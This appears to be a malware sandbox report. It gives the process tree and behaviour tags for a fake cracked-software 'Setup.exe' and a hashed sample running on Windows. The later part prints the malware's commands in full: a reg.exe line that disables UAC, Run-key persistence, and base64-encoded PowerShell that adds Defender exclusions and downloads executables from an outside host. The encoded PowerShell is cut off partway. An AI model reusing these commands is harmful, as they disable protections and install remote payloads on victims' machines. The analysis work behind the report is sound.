        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11772 /prefetch:1
        5⤵
        
        PID:4780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5444,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4460 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5668,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2688 /prefetch:1
  2⤵
  PID:7308
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5852,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4944 /prefetch:1
  2⤵
  PID:7484
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4492,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6076 /prefetch:8
  2⤵
  PID:8096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5676,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6000 /prefetch:8
  2⤵
  PID:5400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=6000,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5912 /prefetch:1
  2⤵
  PID:3332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5004,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5896 /prefetch:1
  2⤵
  PID:1872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5132,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5436 /prefetch:1
  2⤵
  PID:6248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=6156,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6164 /prefetch:1
  2⤵
  PID:4184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=6152,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5124 /prefetch:1
  2⤵
  PID:6212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=4844,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5948 /prefetch:1
  2⤵
  PID:5684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6516,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5168 /prefetch:8
  2⤵
  PID:7328
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6512,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6660 /prefetch:8
  2⤵
  PID:1776
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=6664,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6688 /prefetch:1
  2⤵
  PID:3088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5884,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3284 /prefetch:8
  2⤵
  PID:7252
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=6452,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5128 /prefetch:1
  2⤵
  PID:372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=6608,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5044 /prefetch:1
  2⤵
  PID:7804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5064,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4460 /prefetch:8
  2⤵
  PID:6692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6508,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6332 /prefetch:8
  2⤵
  PID:6620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1108,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5900 /prefetch:8
  2⤵
  PID:5504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6808,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6604 /prefetch:8
  2⤵
  PID:7672
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6648,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6604 /prefetch:8
  2⤵
  PID:4960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5088,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4928 /prefetch:8
  2⤵
  PID:7660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4940,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5940 /prefetch:8
  2⤵
  PID:4216

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3928

C:\Program Files (x86)\Glarysoft\Malware Hunter\Cloudscan\MHCloudSvc.exe
"C:\Program Files (x86)\Glarysoft\Malware Hunter\Cloudscan\MHCloudSvc.exe" -Embedding
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4108

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5172

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5416

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1644

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4808

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\1efdae1f32b64962af92c9fd3b98b58a /t 5756 /p 5772
1⤵
PID:7080

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
PID:5336

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" SetDateTime
1⤵
- Suspicious use of SetWindowsHookEx
PID:7772

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" SetInternetTime 1
1⤵
- System Time Discovery
PID:7836

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" SetTimeZoneAutoUpdate 1
1⤵
PID:2404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s tzautoupdate
1⤵
PID:4040

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" SetNTPSync
1⤵
PID:7668

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" SetInternetTime 0
1⤵
- System Time Discovery
PID:7532

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" SetTimeZoneAutoUpdate 0
1⤵
PID:6788

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" SetDateTime
1⤵
- Suspicious use of SetWindowsHookEx
PID:7572

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f4 0x3ac
1⤵
PID:5108

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:6832

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap20647:138:7zEvent25682
1⤵
PID:2208

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌b1!\" -an -ai#7zMap12472:210:7zEvent2203
1⤵
PID:6612

C:\Program Files (x86)\Glarysoft\Malware Hunter\malwarehunter.exe
"C:\Program Files (x86)\Glarysoft\Malware Hunter\malwarehunter.exe" /scan "C:\Users\Admin\Downloads\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌b1!\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:384

C:\Users\Admin\Downloads\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌b1!\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌\Setup.exe
"C:\Users\Admin\Downloads\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌b1!\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌\Setup.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5500
- C:\Users\Admin\AppData\Roaming\danc\RQPPFBHCBPWU\nc.exe
  C:\Users\Admin\AppData\Roaming\danc\RQPPFBHCBPWU\nc.exe
  2⤵
  - Executes dropped EXE
  PID:7812
- C:\Windows\SysWOW64\more.com
  C:\Windows\SysWOW64\more.com
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:2788
- - C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
    C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6348

C:\Users\Admin\Downloads\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌b1!\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌\Setup.exe
"C:\Users\Admin\Downloads\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌b1!\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌\Setup.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5604
- C:\Users\Admin\AppData\Roaming\danc\RQPPFBHCBPWU\nc.exe
  C:\Users\Admin\AppData\Roaming\danc\RQPPFBHCBPWU\nc.exe
  2⤵
  - Executes dropped EXE
  PID:6496
- C:\Windows\SysWOW64\more.com
  C:\Windows\SysWOW64\more.com
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:7404
- - C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
    C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7400

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\*\" -ad -an -ai#7zMap28864:1318:7zEvent27972
1⤵
PID:4792

C:\Program Files (x86)\Glarysoft\Malware Hunter\malwarehunter.exe
"C:\Program Files (x86)\Glarysoft\Malware Hunter\malwarehunter.exe" /scan "C:\Users\Admin\Downloads\samples"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5136

C:\Users\Admin\Downloads\samples\0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d\0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe
"C:\Users\Admin\Downloads\samples\0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d\0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe"
1⤵
- Adds policy Run key to start application
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2760
- C:\Windows\SysWOW64\cmd.exe
  /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7380
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:7904
- C:\ProgramData\BraveShared\BraveSharedUpdater.exe
  "C:\ProgramData\BraveShared\BraveSharedUpdater.exe"
  2⤵
  - Adds policy Run key to start application
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:1776
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6792
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:4184
- - \??\c:\program files (x86)\internet explorer\iexplore.exe
    "c:\program files (x86)\internet explorer\iexplore.exe"
    3⤵
    - Adds policy Run key to start application
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious behavior: MapViewOfSection
    PID:5412
  - - C:\Windows\SysWOW64\cmd.exe
      /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5420
    - - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:3660
  - - C:\Windows\SysWOW64\svchost.exe
      svchost.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:7496
  - - C:\ProgramData\BraveCrashHandler.exe
      "C:\ProgramData\BraveCrashHandler.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      PID:7776
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0Y3GELDX.bat" "C:\ProgramData\BraveCrashHandler.exe" "
        5⤵
        
        PID:4136
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKAGkAZgAoAC0ATgBvAHQAIAAkACgAJAAoAHcAaABvAGEAbQBpACkAIAAtAGUAcQAgACIAbgB0ACAAYQB1AHQAaABvAHIAaQB0AHkAXABzAHkAcwB0AGUAbQAiACkAKQAgAHsACgAgACAAIAAgACQASQBzAFMAeQBzAHQAZQBtACAAPQAgACQAZgBhAGwAcwBlAAoACgAgACAAIAAgAGkAZgAgACgALQBOAG8AdAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQAgAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACQAQwBvAG0AbQBhAG4AZABMAGkAbgBlACAAPQAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAAYAAiACIAIAArACAAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAE0AeQBDAG8AbQBtAGEAbgBkAC4AUABhAHQAaAAgACsAIAAiAGAAIgAgACIAIAArACAAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAFUAbgBiAG8AdQBuAGQAQQByAGcAdQBtAGUAbgB0AHMACgAgACAAIAAgACAAIAAgACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAUABvAHcAZQByAFMAaABlAGwAbAAuAGUAeABlACAALQBWAGUAcgBiACAAUgB1AG4AYQBzACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACQAQwBvAG0AbQBhAG4AZABMAGkAbgBlAAoAIAAgACAAIAAgACAAIAAgAEUAeABpAHQACgAgACAAIAAgAH0ACgAKACAAIAAgACAAJABwAHMAZQB4AGUAYwBfAHAAYQB0AGgAIAA9ACAAJAAoAEcAZQB0AC0AQwBvAG0AbQBhAG4AZAAgAFAAcwBFAHgAZQBjACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIAAnAGkAZwBuAG8AcgBlACcAKQAuAFMAbwB1AHIAYwBlACAACgAgACAAIAAgAGkAZgAoACQAcABzAGUAeABlAGMAXwBwAGEAdABoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACQAQwBvAG0AbQBhAG4AZABMAGkAbgBlACAAPQAgACIAIAAtAGkAIAAtAHMAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIABgACIAIgAgACsAIAAkAE0AeQBJAG4AdgBvAGMAYQB0AGkAbwBuAC4ATQB5AEMAbwBtAG0AYQBuAGQALgBQAGEAdABoACAAKwAgACIAYAAiACAAIgAgACsAIAAkAE0AeQBJAG4AdgBvAGMAYQB0AGkAbwBuAC4AVQBuAGIAbwB1AG4AZABBAHIAZwB1AG0AZQBuAHQAcwAgAAoAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAHAAcwBlAHgAZQBjAF8AcABhAHQAaAAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAEMAbwBtAG0AYQBuAGQATABpAG4AZQAKACAAIAAgACAAIAAgACAAIABlAHgAaQB0AAoAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgAH0ACgAKAH0AIABlAGwAcwBlACAAewAKACAAIAAgACAAJABJAHMAUwB5AHMAdABlAG0AIAA9ACAAJAB0AHIAdQBlAAoAfQAKAAoANgA3AC4ALgA5ADAAfABmAG8AcgBlAGEAYwBoAC0AbwBiAGoAZQBjAHQAewAKACAAIAAgACAAJABkAHIAaQB2AGUAIAA9ACAAWwBjAGgAYQByAF0AJABfAAoAIAAgACAAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgAkACgAJABkAHIAaQB2AGUAKQA6AFwAIgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAKACAAIAAgACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgACIAJAAoACQAZAByAGkAdgBlACkAOgBcACoAIgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAKAH0ACgA=
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5176
        
        C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 65001
        7⤵
        
        PID:7256
        
        C:\Windows\system32\whoami.exe
        
        "C:\Windows\system32\whoami.exe"
        7⤵
        
        PID:6376
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAZgBpAGwAZQBzAFQAbwBDAGgAZQBjAGsAIAA9ACAAQAAoAAoAIAAgACAAIABAAHsAUABhAHQAaAA9ACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAOwAgAFUAcgBsAD0AIgBoAHQAdABwAHMAOgAvAC8AcwBqAGMAMQAuAHYAdQBsAHQAcgBvAGIAagBlAGMAdABzAC4AYwBvAG0ALwBjAGYAYwBiADYAOQBmAGYALwBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AFAAYQB0AGgAPQAiACQAZQBuAHYAOgBVAFMARQBS